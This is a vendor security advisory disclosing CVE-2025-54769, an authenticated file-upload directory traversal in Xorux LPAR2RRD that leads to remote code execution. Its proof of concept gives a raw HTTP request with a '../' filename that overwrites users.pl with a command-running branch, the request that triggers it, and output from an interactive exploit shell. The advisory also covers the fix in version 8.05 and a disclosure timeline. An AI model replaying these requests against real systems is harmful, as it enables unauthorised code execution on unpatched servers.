Security Advisory

Xorux LPAR2RRD File Upload Directory Traversal

CWE-24 Path Traversal: '../filedir' CWE-434 Unrestricted Upload of File with Dangerous Type CWE-648 Incorrect Use of Privileged APIs

Advisory ID

KL-001-2025-016

CVE ID

CVE-2025-54769

Published

2025-07-28

Vendor

Xorux

Affected Systems

Product

LPAR2RRD

Version

8.04 and prior

Platform

Rocky Linux 8.10

Discovered By

Jim Becher (KoreLogic)

Download (signed .txt)

Back to Advisories

Vulnerability Details

Affected Vendor: Xorux

Affected Product: LPAR2RRD

Affected Version: 8.04 and prior

Platform: Rocky Linux 8.10

CWE Classification: CWE-24: Path Traversal: '../filedir', CWE-434: Unrestricted Upload of File with Dangerous Type, CWE-648: Incorrect Use of Privileged APIs

CVE ID: CVE-2025-54769

Vulnerability Description

An authenticated, read-only user can upload a file and perform a directory traversal to have the uploaded file placed in a location of their choosing. This can be used to overwrite existing PERL modules within the application to achieve remote code execution (RCE) by an attacker.

Technical Description

The filename can be altered manually to direct on the local filesystem on the Xormon Original appliance the upgrade file should be placed. The Xormon appliance will recognize the file as not being a valid upgrade package, but still writes the file to the filesystem. This can be exploited to write a valid PERL script into the /home/lpar2rrd/lpar2rrd/bin/ directory, where it can be called by existing scripts that are accessible via https://<IP>/lpar2rrd-cgi/<script> URL.

Mitigation and Remediation Recommendation

Xorux released version 8.05, which includes a remediation for this vulnerability. See https://lpar2rrd.com/note800.php.

Credit

This vulnerability was discovered by Jim Becher of KoreLogic, Inc.

Proof of Concept

A simple proof of concept is to alter the users.pl script and add some additional logic which will perform the id command. The POST is performed using a read-only user, authenticated via Basic Auth.

    POST /lpar2rrd-cgi/upgrade.sh HTTP/1.1
    Host: 172.31.255.207
    Cookie: browserTZ=America%2FChicago
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=----geckoformboundaryc85a7a0a8e67e32643575b13f47b175f
    Content-Length: 15057
    Origin: https://172.31.255.207
    Authorization: Basic amJlY2hlcjpqYmVjaGVy
    Referer: https://172.31.255.207/lpar2rrd/index.html?amenu=upgrade&tab=0
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Priority: u=0
    Te: trailers
    Connection: keep-alive

    ------geckoformboundaryc85a7a0a8e67e32643575b13f47b175f
    Content-Disposition: form-data; name="upgfile"; filename="../home/lpar2rrd/lpar2rrd/bin/users.pl"
    Content-Type: application/x-perl

    use strict;
    use warnings;
    use CGI::Carp qw(fatalsToBrowser);
    use Data::Dumper;
    ...
    [SNIPPED for brevity]
    # Kore
    elsif ( $PAR{cmd} eq "kore" ) {
      my $out;
      print "Content-type: text/html\n\n";
      $out = system("/usr/bin/id");
      print $out;

    }
    ...
    [SNIPPED for brevity]

The response from the Xormon Original appliance is:

    HTTP/1.1 200 OK
    Date: Thu, 03 Apr 2025 00:37:18 GMT
    Server: Apache
    X-Frame-Options: SAMEORIGIN
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/json
    Content-Length: 93

    { "success": false, "message" : "This file doesn't look like the upgrade package", "log": ""}

But the file is still written to the filesystem. Subsequent calls to the https://<ip>/lpar2rrd-cgi/users.sh script with the cmd added return the output of the id command, as show below.

    GET /lpar2rrd-cgi/users.sh?cmd=kore HTTP/1.1
    Host: 172.31.255.207
    Cookie: browserTZ=America%2FChicago
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Authorization: Basic amJlY2hlcjpqYmVjaGVy
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: none
    Sec-Fetch-User: ?1
    Priority: u=0, i
    Pragma: no-cache
    Cache-Control: no-cache
    Te: trailers
    Connection: keep-alive


    HTTP/1.1 200 OK
    Date: Thu, 03 Apr 2025 00:37:42 GMT
    Server: Apache
    X-Frame-Options: SAMEORIGIN
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    Content-Length: 61

    uid=1005(lpar2rrd) gid=1005(lpar2rrd) groups=1005(lpar2rrd)
    0

This can be expanded upon to create a full-fledged exploit.

    attacker $ python3 xormon-orig-readonly-rce.py
    >id
    uid=1005(lpar2rrd) gid=1005(lpar2rrd) groups=1005(lpar2rrd)
    0
    >netstat -an | grep LIST | head -10
    tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN
    tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
    tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN
    tcp        0      0 0.0.0.0:8162            0.0.0.0:*               LISTEN
    tcp6       0      0 :::111                  :::*                    LISTEN
    tcp6       0      0 :::80                   :::*                    LISTEN
    tcp6       0      0 :::22                   :::*                    LISTEN
    tcp6       0      0 ::1:25                  :::*                    LISTEN
    tcp6       0      0 :::8443                 :::*                    LISTEN
    tcp6       0      0 127.0.0.1:39931         :::*                    LISTEN
    0
    >ps -efww | grep "java"
    lpar2rrd     934       1  0 Apr02 ?        01:24:22 /usr/bin/java -Xms512M -Xmx1024M -server -XX:+UseG1GC -Dh2.bindAddress=127.0.0.1 -jar /opt/xorux/xormon/xormon.war
    lpar2rrd 1730823 1730810  0 12:14 ?        00:00:00 sh -c ps -efww | grep "java"
    lpar2rrd 1730825 1730823  0 12:14 ?        00:00:00 grep java
    0
    >quit
    attacker $

The contents of this advisory are copyright(c) 2025 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy

Disclosure Timeline

2025-07-17

KoreLogic requests point-of-contact to securely report several vulnerabilities to Xorux.

2025-07-18

Vendor provides support@xorux.com as the point-of-contact, noting that they do not use PGP.

2025-07-21

KoreLogic submits this vulnerability and four additional discoveries to Xorux.

2025-07-23

Vendor acknowledges receipt, stating that the issue has been remediated and a new version of the affected product will be available 2025-07-25.

2025-07-25

Xorux publishes updated version of the affected product.

2025-07-28

KoreLogic public disclosure.

Back to Advisories

Responsible Disclosure

KoreLogic follows responsible disclosure practices. All vulnerabilities are reported to affected vendors with appropriate time for remediation before public disclosure.

Vendor notification and coordination

90+ day disclosure timeline

CVE coordination when applicable

Resources & Downloads

Contact Security Team

All Advisories Download signed .txt